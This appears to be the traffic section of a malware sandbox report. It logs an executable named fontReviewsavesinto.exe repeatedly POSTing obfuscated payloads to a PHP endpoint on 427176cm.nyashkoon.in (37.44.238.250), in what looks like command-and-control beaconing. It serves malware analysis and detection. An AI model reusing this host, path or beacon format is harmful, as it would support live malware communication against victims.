                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:58.180268049 CET | 1032 | OUT | Data Raw: 5e 5d 43 59 5c 59 5f 56 5e 5e 54 55 56 58 5a 5b 5f 57 59 5c 52 5a 52 5b 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^]CY\Y_V^^TUVXZ[_WY\RZR[YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.G$"3=1_%2^;Y*&4Y3<+[*"U$9$=#0+X>&G!']*/
                                        Nov 5, 2024 08:12:58.642144918 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:58.733824968 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:56 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        47 | 192.168.2.7 | 50010 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:58.869741917 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:59.224294901 CET | 1032 | OUT | Data Raw: 5e 5d 43 5e 59 5f 5a 56 5e 5e 54 55 56 5c 5a 50 5f 5a 59 51 52 50 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^]C^Y_ZV^^TUV\ZP_ZYQRPRZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-$! Y$["$7,+$^>'0/(=-1'<&>7$; *:&G!']*?
                                        Nov 5, 2024 08:12:59.693938017 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:59.765176058 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:57 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        48 | 192.168.2.7 | 50015 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:59.900954008 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:00.255709887 CET | 1032 | OUT | Data Raw: 5e 58 46 5e 5c 5f 5a 53 5e 5e 54 55 56 58 5a 5d 5f 54 59 59 52 5f 52 5b 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^XF^\_ZS^^TUVXZ]_TYYR_R[YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.A$28^'>=X3;/;0_)Y'??X=-W3)$8$#]>&G!']*/


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        49 | 192.168.2.7 | 50017 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:00.386843920 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1276
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:00.741700888 CET | 1276 | OUT | Data Raw: 5b 5a 43 5d 59 59 5a 55 5e 5e 54 55 56 5f 5a 51 5f 5a 59 5c 52 59 52 5e 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [ZC]YYZU^^TUV_ZQ_ZY\RYR^YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-%2 0-]$T;;8?=%$Z'_)&T3<_3-?'+\*&G!']*3
                                        Nov 5, 2024 08:13:01.197571039 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:01.280098915 CET | 308 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:59 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Data Raw: 0d 15 3a 00 24 38 0e 50 20 2a 00 55 28 58 2c 11 36 24 24 00 2f 5b 33 02 30 33 2b 0b 3e 3f 29 0c 34 29 32 10 23 3d 02 1b 20 10 20 0c 2a 0b 2f 5a 07 10 26 00 31 22 20 0a 26 58 3b 02 24 0a 2f 5c 2a 02 3f 04 21 3b 01 5d 31 15 3d 5f 32 04 2b 56 2f 29 00 0a 2e 06 33 5d 39 32 2f 00 32 34 2c 54 0d 10 39 1a 29 1f 0e 57 2a 5a 3e 05 25 0e 28 10 20 03 23 5b 3e 2a 20 1b 3c 13 25 01 30 0e 1d 09 36 0c 2a 0b 24 38 34 1e 25 21 34 50 24 22 25 55 2c 03 2e 56 0f 30 57 51
                                        Data Ascii: :$8P *U(X,6$$/[303+>?)4)2#= */Z&1" &X;$/\*?!;]1=_2+V/).3]92/24,T9)W*Z>%( #[>* <%06*$84%!4P$"%U,.V0WQ


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        50 | 192.168.2.7 | 50018 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:00.512626886 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:00.865135908 CET | 1032 | OUT | Data Raw: 5e 59 43 59 5c 5d 5f 55 5e 5e 54 55 56 59 5a 58 5f 54 59 50 52 5e 52 51 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^YCY\]_U^^TUVYZX_TYPR^RQYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.B'31Y$<,8X?%<_3(=-V'*\$3$'*&G!']*+
                                        Nov 5, 2024 08:13:01.325997114 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:01.401242018 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:59 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        51 | 192.168.2.7 | 50021 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:01.523168087 CET | 287 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:13:01.880660057 CET | 1032 | OUT | Data Raw: 5b 5a 46 59 5c 5e 5f 55 5e 5e 54 55 56 5c 5a 5c 5f 5a 59 58 52 5c 52 59 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [ZFY\^_U^^TUV\Z\_ZYXR\RYYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.G$1 _0=)32#/>&7%<)$<$.#Y0++Y+:&G!']*?
                                        Nov 5, 2024 08:13:02.342749119 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:02.418144941 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:00 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        52 | 192.168.2.7 | 50022 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:02.538974047 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:02.896171093 CET | 1032 | OUT | Data Raw: 5e 5e 43 58 59 5c 5f 52 5e 5e 54 55 56 5d 5a 50 5f 52 59 5a 52 51 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^^CXY\_R^^TUV]ZP_RYZRQRZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.F0"[$-%'T 80_?%3$*.2T3Z&0[#X38?]*&G!']*
                                        Nov 5, 2024 08:13:03.130461931 CET | 1032 | OUT | Data Raw: 5e 5e 43 58 59 5c 5f 52 5e 5e 54 55 56 5d 5a 50 5f 52 59 5a 52 51 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^^CXY\_R^^TUV]ZP_RYZRQRZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.F0"[$-%'T 80_?%3$*.2T3Z&0[#X38?]*&G!']*
                                        Nov 5, 2024 08:13:03.359819889 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:03.478959084 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:01 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        53 | 192.168.2.7 | 50023 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:03.601104975 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:03.958697081 CET1032OUTData Raw: 5b 5d 43 59 59 54 5f 56 5e 5e 54 55 56 58 5a 5b 5f 55 59 5e 52 5b 52 5b 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: []CYYT_V^^TUVXZ[_UY^R[R[YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-$1,['-'2$],;*_'')[-$90[43#*&G!']*/
                                        Nov 5, 2024 08:13:04.410329103 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:04.489789009 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:02 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        54 | 192.168.2.7 | 50024 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:04.619370937 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:04.974268913 CET1032OUTData Raw: 5e 58 43 5e 5c 59 5f 50 5e 5e 54 55 56 53 5a 51 5f 55 59 5c 52 5f 52 58 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^XC^\Y_P^^TUVSZQ_UY\R_RXYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.%2,_$1X$_/0_>0X$8)[5'<&_&=3()&G!']*
                                        Nov 5, 2024 08:13:05.422631025 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:05.506674051 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:03 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        55 | 192.168.2.7 | 50025 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:05.632958889 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1028
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:05.990072012 CET1028OUTData Raw: 5b 5c 46 5a 59 5a 5a 50 5e 5e 54 55 56 5a 5a 5a 5f 52 59 5f 52 51 52 50 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [\FZYZZP^^TUVZZZ_RY_RQRPYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-%!$Z'>$ ^;80)%<'??(-V0,5$[#_38Y)&G!']*+


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        56 | 192.168.2.7 | 50026 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:06.293687105 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1300
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:06.646330118 CET1300OUTData Raw: 5e 58 43 5c 59 5a 5f 51 5e 5e 54 55 56 5e 5a 5d 5f 5a 59 5d 52 5f 52 5c 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^XC\YZ_Q^^TUV^Z]_ZY]R_R\YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.B3(Y'.:',[8,?5'',<)',:3.83^'>:&G!']*7
                                        Nov 5, 2024 08:13:07.116204023 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:07.192733049 CET | 308 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:05 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Data Raw: 0d 15 3a 01 25 28 0a 56 23 04 0c 50 2b 3d 24 5d 35 19 27 5a 2f 2e 28 10 27 55 37 0f 2a 2f 0c 1b 34 2a 2e 5a 21 13 24 5d 22 3e 2c 0b 2b 31 2f 5a 07 10 25 10 32 1c 0a 0c 25 10 20 13 27 55 27 5b 3e 3c 1a 5a 21 3b 3f 5b 26 15 2a 02 25 29 27 52 2f 2a 3a 0b 2d 3b 30 05 3a 21 2f 06 25 34 2c 54 0d 10 3a 0b 2a 32 24 52 2a 3f 25 58 32 37 24 10 37 2d 2f 1d 3e 5c 33 08 3f 04 25 05 30 20 1a 57 21 1c 0b 10 32 15 3c 58 30 31 24 53 26 32 25 55 2c 03 2e 56 0f 30 57 51
                                        Data Ascii: :%(V#P+=$]5'Z/.('U7*/4*.Z!$]">,+1/Z%2% 'U'[><Z!;?[&*%)'R/*:-;0:!/%4,T:*2$R*?%X27$7-/>\3?%0 W!2<X01$S&2%U,.V0WQ


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        57 | 192.168.2.7 | 50027 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:06.413358927 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1028
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:06.771173000 CET1028OUTData Raw: 5e 58 43 58 59 5a 5f 50 5e 5e 54 55 56 5a 5a 50 5f 53 59 59 52 5e 52 51 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^XCXYZ_P^^TUVZZP_SYYR^RQYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.$2$_%-.0-+'*68X3<#Z)-&P'/.Y$?Y'+=:&G!']*
                                        Nov 5, 2024 08:13:07.227076054 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:07.300396919 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:05 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        58 | 192.168.2.7 | 50028 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:07.446343899 CET | 287 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:13:07.802480936 CET1032OUTData Raw: 5e 5d 43 52 59 5f 5a 50 5e 5e 54 55 56 5e 5a 5a 5f 56 59 5f 52 5d 52 58 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^]CRY_ZP^^TUV^ZZ_VY_R]RXYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.C$"8[%--'!(;Y)C'0<7Y*"V3*]'>7Y3<=&G!']*7
                                        Nov 5, 2024 08:13:08.264884949 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:08.338540077 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:06 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        59 | 192.168.2.7 | 50029 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:08.465864897 CET | 287 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:13:08.819047928 CET1032OUTData Raw: 5b 5a 43 53 59 5e 5a 5c 5e 5e 54 55 56 52 5a 5a 5f 52 59 58 52 5d 52 5d 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
